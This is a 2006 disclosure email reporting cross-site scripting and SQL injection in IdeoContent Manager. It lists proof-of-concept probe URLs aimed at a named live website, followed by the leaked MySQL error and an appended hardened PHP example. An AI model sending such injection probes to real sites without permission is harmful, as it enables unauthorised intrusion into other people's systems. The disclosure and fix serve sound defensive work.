From: preddy .
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Wed, 18 Jan 2006 18:25:37 -0500
Subject: [OSVDB Mods] IdeoContent Manager© - Cross Site Scripting & SQL Injection

IdeoContent Manager© - Cross Site Scripting & SQL Injection

Vendor URL: http://www.ideosoft.ro/cms/manager/

PoC:

XSS:
http://www.roel.ro/news_full.php?&page=2">
http://www.roel.ro/index.php?goto_id=">

SQL Injection:
http://www.roel.ro/index.php?goto_id=18'
http://www.roel.ro/index.php?mid='

Result:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/httpd/html/includes/application_top.php on line 61
1064 - You have an error in your SQL syntax near '\'' at line 1
select * from protected_pages where menu_id =18\'
[TEP STOP]

Preddy
RootShell Security Group
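The leaked error shows the request value being concatenated straight into `select * from protected_pages where menu_id = ...`, and the query result then being passed to `mysql_fetch_array()` without a check. As an added illustration, not IdeoContent Manager's actual code (the post does not include it): the assumed vulnerable shape next to a hardened version using mysqli prepared statements, with the reflected `page` parameter HTML-encoded on output; the `$db` connection and the `protected_pages`/`menu_id` names are taken from the error message and are assumptions.

```php
<?php
// Added example; the vendor's real code is not in the post. Assumes a mysqli
// connection $db and a table protected_pages with an integer menu_id column.

// Assumed vulnerable shape, reconstructed from the error in the advisory:
// the raw goto_id value is concatenated into the SQL string, so
// goto_id=18' produces "... where menu_id =18'" and a 1064 syntax error,
// and the false result is then handed to the fetch call, giving the warning.
function lookup_page_unsafe(mysqli $db, string $goto_id): ?array {
    $sql = "select * from protected_pages where menu_id =" . $goto_id;
    $res = $db->query($sql);            // false on SQL error
    if ($res === false) {
        return null;                    // the error text must not reach the client
    }
    return $res->fetch_assoc() ?: null;
}

// Hardened version: require an integer id, bind it as a parameter so it can
// never alter the query structure, and log (not display) database errors.
function lookup_page_safe(mysqli $db, string $goto_id): ?array {
    if (!ctype_digit($goto_id)) {
        return null;                    // rejects 18', "> and anything non-numeric
    }
    $id = (int) $goto_id;
    $stmt = $db->prepare("select * from protected_pages where menu_id = ?");
    $stmt->bind_param("i", $id);
    if (!$stmt->execute()) {
        error_log("protected_pages lookup failed: " . $stmt->error);  // server side only
        return null;
    }
    // get_result() needs the mysqlnd driver; use bind_result() otherwise.
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// The reflected XSS on news_full.php?page= is closed by encoding the value
// wherever it is written back: URL-encoded inside the href, HTML-encoded
// in the attribute and in the link text, so a "> probe stays inert text.
function render_page_link(string $page): string {
    $href = 'news_full.php?page=' . rawurlencode($page);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">'
         . htmlspecialchars($page, ENT_QUOTES, 'UTF-8') . '</a>';
}
```

With `display_errors` off and the error logged server-side, an injected quote produces only an empty page instead of the query text and file path shown in the advisory.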